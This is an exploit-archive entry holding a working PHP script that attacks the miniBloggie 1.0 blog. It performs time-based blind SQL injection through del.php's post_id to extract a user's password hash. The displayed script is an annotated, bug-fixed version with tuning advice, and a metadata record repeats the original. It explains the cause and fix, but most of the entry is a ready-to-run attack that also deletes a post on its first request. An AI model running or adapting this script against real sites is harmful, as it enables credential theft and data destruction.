ID 1337DAY-ID-3915
Type zdt
Reporter StAkeR
Modified 2008-10-18T00:00:00
Description
Exploit for unknown platform in category web applications
============================================================
miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
============================================================
#!/usr/bin/php
<?php
// Silence notices and warnings: the script below appends (.=) to variables it
// never initialises and fsockopen() emits a warning when the connect fails, so
// without this the "# ..." status lines would be mixed with PHP diagnostics.
error_reporting(0);
/*
miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
------------------------------------------------------------
Author -> StAkeR aka athos
Date -> 18/10/2008
------------------------------------------------------------
File del.php
25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
27.
28. if ($confirm=="") {
29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>");
30. }
31. elseif ($confirm=="yes") {
32. // Data Base Connection //
33. dbConnect();
34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
36. $confirm ="";
37. notice("Del Post", "Data Deleted");
38. }
39. else notice( "Delete Error, Unable to complete the task !" );
40. ?>
NOTE:
$sql = "DELETE FROM blogdata WHERE post_id=$post_id";
$post_id comes straight from $_GET (line 25) and is interpolated into the DELETE
unescaped and unquoted, so anything appended after the number is executed as SQL
with the application's database privileges. Note that the injection point is a
DELETE statement: a payload that starts with a real id, such as the "1 or (...)"
used by this script, also removes post_id=1 on the first request, so only run it
against a disposable install. The same raw $post_id is also echoed into the
confirmation link on line 29; whether that is exploitable depends on notice(),
which is not shown here.
How to fix? post_id is compared unquoted, so cast it before use
(intval($post_id) or (int)$post_id) -- or, better, move the query to a prepared
statement with a bound parameter (mysqli/PDO); the legacy mysql_* API used here
has no prepared statements.
*/
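/**
 * Send one GET to del.php carrying the injected post_id and return the raw
 * HTTP response (status line, headers and body).
 *
 * The caller only times this call; nothing in the script inspects the
 * response text, so the return value is informational.
 *
 * @param string $host "hostname:port" -- loosely validated below; the usage
 *                     text is printed (and the script exits) on mismatch
 * @param string $path web path of the miniBloggie install, e.g. "/minibloggie"
 * @param string $evil already URL-encoded post_id payload (see charme())
 * @return string      whatever was read before the server closed the connection
 */
function get($host,$path,$evil)
{
    // Same loose format check as before: a word character, a colon, a digit.
    if(!preg_match('/\w:[0-9]/i',$host)) alert();
    list($hostname,$port) = explode(':',$host,2);
    $port = (int)$port;

    if(!$sock = fsockopen($hostname,$port)) die('connection refused');

    // Normalise the install path so "/minibloggie" does not become
    // "//minibloggie/del.php" and an empty path still yields "/del.php".
    $base = trim($path,'/');
    $uri  = ($base === '' ? '' : '/'.$base).'/del.php?post_id='.$evil.'&confirm=yes';

    // HTTP/1.1 requires a Host header. The original wrote "$host[0]", which is
    // a string offset -- only the first character of the hostname -- and so
    // broke name-based virtual hosts. Append the port when it is not 80.
    $hostHeader = ($port === 80) ? $hostname : "$hostname:$port";

    $data  = "GET $uri HTTP/1.1\r\n";
    $data .= "Host: $hostHeader\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Connection: close\r\n\r\n";

    fputs($sock,$data);

    // Read until the server closes the connection (Connection: close); the
    // time spent here is the blind-injection side channel measured by the caller.
    $html = '';
    while(!feof($sock)) { $html .= fgets($sock); }
    fclose($sock);

    return $html;
}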
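/**
 * Print the banner and usage text, then exit.
 *
 * $argv is an ordinary global, not a superglobal, so it is undefined inside a
 * function: the original interpolated {$argv[0]} here and printed
 * "php  [host:port] ..." with an empty script name. $_SERVER['argv'] is
 * reachable from any scope; fall back to this file's name if it is absent.
 */
function alert()
{
    $self = isset($_SERVER['argv'][0]) ? $_SERVER['argv'][0] : basename(__FILE__);
    echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
    echo "# Usage: php {$self} [host:port] [path] [user_id]\r\n";
    echo "# Usage: php {$self} localhost:80 /minibloggie 1\r\n";
    die;
}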
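/**
 * Build the URL-encoded post_id payload for one character guess.
 *
 * Interpolated into `DELETE FROM blogdata WHERE post_id=$post_id` it produces
 *   ... WHERE post_id=1 or (select if((ascii(substring(password,C,1))=X),
 *                          benchmark(N,char(0)),0) from blogusername where id=I)#
 * When the character at position C of user I's password hash equals X, MySQL
 * spins in benchmark() and the response is delayed; otherwise it returns at
 * once. In both cases the subquery evaluates to 0, so the WHERE still matches
 * post_id=1 and that post is deleted by the first request.
 *
 * @param int $char       ASCII code to test for
 * @param int $colum      1-based character position (MySQL SUBSTRING() is
 *                        1-based; position 0 yields '' and ASCII('') is 0)
 * @param int $id         blogusername.id row whose password column is read
 * @param int $iterations benchmark() loop count; raise it if the target is
 *                        fast enough that a hit stays under the caller's threshold
 * @return string         urlencode()d payload ready for the query string
 */
function charme($char,$colum,$id,$iterations = 200000000)
{
    // Cast so the payload is always syntactically valid SQL, even if a caller
    // passes a missing array element (null) or a string.
    $char       = (int)$char;
    $colum      = (int)$colum;
    $id         = (int)$id;
    $iterations = (int)$iterations;

    $sql = "1 or (select if((ascii(substring(password,$colum,1))=$char),"
         . "benchmark($iterations,char(0)),0) from blogusername where id=$id)#";

    return urlencode($sql);
}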
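// Candidate characters for each hash position: the 16 lowercase hex digits.
// The original array also held a dummy 0 at index 0 and was walked one past
// its end ($j<=17 over 17 elements), sending one malformed guess per position.
$hash = array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

// Number of characters to recover: 32, which is what a hex candidate set fits
// (the length suggests an MD5 digest, but the app's hash function is not shown here).
$length = 32;

// A guess counts as a hit when the round trip exceeds this many seconds.
// benchmark() is CPU-bound on the target, so if every position comes back as
// a miss, calibrate this (or charme()'s iteration count) against the host.
$threshold = 12;

if($argc < 4) alert();

$target  = $argv[1];
$path    = $argv[2];
$user_id = intval($argv[3]);

$password = '';

// Every request below is a DELETE whose WHERE reduces to "post_id=1 or 0":
// the first one removes post 1. The side channel presumably also needs at
// least one row left in blogdata for the WHERE to be evaluated at all --
// verify before relying on it.
//
// MySQL SUBSTRING() positions are 1-based. The original started $c at 0:
// SUBSTRING(x,0,1) is '' and ASCII('') is 0, which matched the dummy 0
// candidate, cost one slow request and prepended a NUL byte to the output.
for($c = 1; $c <= $length; $c++)
{
    $found = false;
    foreach($hash as $ch)
    {
        $start = microtime(true);
        get($target,$path,charme($ch,$c,$user_id));
        if(microtime(true) - $start > $threshold)
        {
            $password .= chr($ch);
            $found = true;
            break;
        }
    }
    // No candidate delayed: the hash is not lowercase hex at this position,
    // the threshold is wrong for this host, or the user id does not exist.
    // Report what was recovered so far instead of guessing blindly onward.
    if(!$found) break;
}

if($password !== '')
{
    echo "# Hash: $password\r\n";
    if(strlen($password) < $length)
    {
        echo "# Note: only ".strlen($password)." of $length characters recovered\r\n";
    }
    die;
}
else
{
    echo "# Exploit Failed!\r\n";
}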
?>
{"published": "2008-10-18T00:00:00", "id": "1337DAY-ID-3915", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 1.3, "vector": "NONE", "modified": "2018-01-10T19:06:04", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310875734", "OPENVAS:1361412562310875548", "OPENVAS:1361412562311220191613", "OPENVAS:1361412562310876709"]}, {"type": "mskb", "idList": ["KB4484098", "KB4462143"]}, {"type": "nessus", "idList": ["EULEROS_SA-2019-1613.NASL", "REDHAT-RHSA-2019-0971.NASL", "ORACLELINUX_ELSA-2019-0971.NASL", "SLACKWARE_SSA_2019-092-01.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-0971"]}, {"type": "redhat", "idList": ["RHSA-2019:0971", "RHSA-2019:0652"]}, {"type": "slackware", "idList": ["SSA-2019-092-01"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/LOCAL/EMACS_MOVEMAIL", "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_CODER_EXEC", "MSF:EXPLOIT/UNIX/WEBAPP/GET_SIMPLE_CMS_UPLOAD_EXEC", "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE", "MSF:EXPLOIT/UNIX/WEBAPP/WEBMIN_UPLOAD_EXEC", "MSF:EXPLOIT/UNIX/X11/X11_KEYBOARD_EXEC"]}], "modified": "2018-01-10T19:06:04", "rev": 2}, "vulnersScore": 1.3}, "type": "zdt", "lastseen": "2018-01-10T19:06:04", "edition": 2, "title": "miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/3915", "modified": "2008-10-18T00:00:00", "bulletinFamily": "exploit", "viewCount": 8, "cvelist": [], "sourceHref": "https://0day.today/exploit/3915", "references": [], "reporter": "StAkeR", "sourceData": "============================================================\r\nminiBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/php \r\n<?php\r\n\r\nerror_reporting(0);\r\n\r\n\r\n/*\r\n miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n 
------------------------------------------------------------\r\n Author -> StAkeR aka athos \r\n Date -> 18/10/2008\r\n ------------------------------------------------------------\r\n \r\n File del.php\r\n \r\n 25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];\r\n 26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];\r\n 27.\r\n 28. if ($confirm==\"\") { \r\n 29. notice(\"Confirmation\", \"Warning : Do you want to delete this post ? <a href=del.php?post_id=\".$post_id.\"&confirm=yes>Yes</a>\");\r\n 30. }\r\n 31. elseif ($confirm==\"yes\") {\r\n 32. // Data Base Connection //\r\n 33. dbConnect();\r\n 34. $sql = \"DELETE FROM blogdata WHERE post_id=$post_id\";\r\n 35. $query = mysql_query($sql) or die(\"Cannot query the database.<br>\" . mysql_error());\r\n 36. $confirm =\"\";\r\n 37. notice(\"Del Post\", \"Data Deleted\");\r\n 38. }\r\n 39. else notice( \"Delete Error, Unable to complete the task !\" );\r\n 40. ?>\r\n\r\n NOTE:\r\n \r\n $sql = \"DELETE FROM blogdata WHERE post_id=$post_id\";\r\n \r\n $post_id isn't escaped so you can execute SQL Code \r\n \r\n How to fix? 
sanize $post_id with intval or int (PHP Functions)\r\n \r\n \r\n*/ \r\n\r\n\r\n\r\nfunction get($host,$path,$evil)\r\n{\r\n if(!preg_match('/\\w:[0-9]/i',$host)) alert();\r\n $inet = explode(':',$host);\r\n\r\n if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');\r\n \r\n $data .= \"GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\\r\\n\";\r\n $data .= \"Host: $host[0]\\r\\n\";\r\n $data .= \"User-Agent: Lynx (textmode)\\r\\n\";\r\n $data .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\n fputs($sock,$data);\r\n \r\n while(!feof($sock)) { $html .= fgets($sock); }\r\n fclose($sock);\r\n \r\n return $html;\r\n}\r\n\r\n\r\nfunction alert()\r\n{\r\n echo \"# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\\r\\n\";\r\n echo \"# Usage: php {$argv[0]} [host:port] [path] [user_id]\\r\\n\";\r\n echo \"# Usage: php {$argv[0]} localhost:80 /minibloggie 1\\r\\n\";\r\n die;\r\n}\r\n\r\n\r\nfunction charme($char,$colum,$id)\r\n{\r\n $sql = \"1 or (select if((ascii(substring(password\".\r\n \",$colum,1))=$char),benchmark(200000000,char(0)),0)\".\r\n \" from blogusername where id=$id)#\";\r\n \r\n return urlencode($sql);\r\n}\r\n\r\n\r\n$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);\r\n$c = 0;\r\n\r\n\r\nfor($i=0;$i<=32;$i++)\r\n{\r\n for($j=0;$j<=17;$j++)\r\n {\r\n $start = time();\r\n \r\n get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));\r\n \r\n $stop = time();\r\n \r\n if($stop - $start > 12)\r\n {\r\n $password .= chr($hash[$j]);\r\n $c++;;\r\n break;\r\n }\r\n }\r\n}\r\n\r\nif(isset($password))\r\n{\r\n echo \"# Hash: $password\\r\\n\";\r\n die;\r\n}\r\nelse\r\n{\r\n echo \"# Exploit Failed!\\r\\n\";\r\n}\r\n \r\n\r\n\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-10] #"}
{}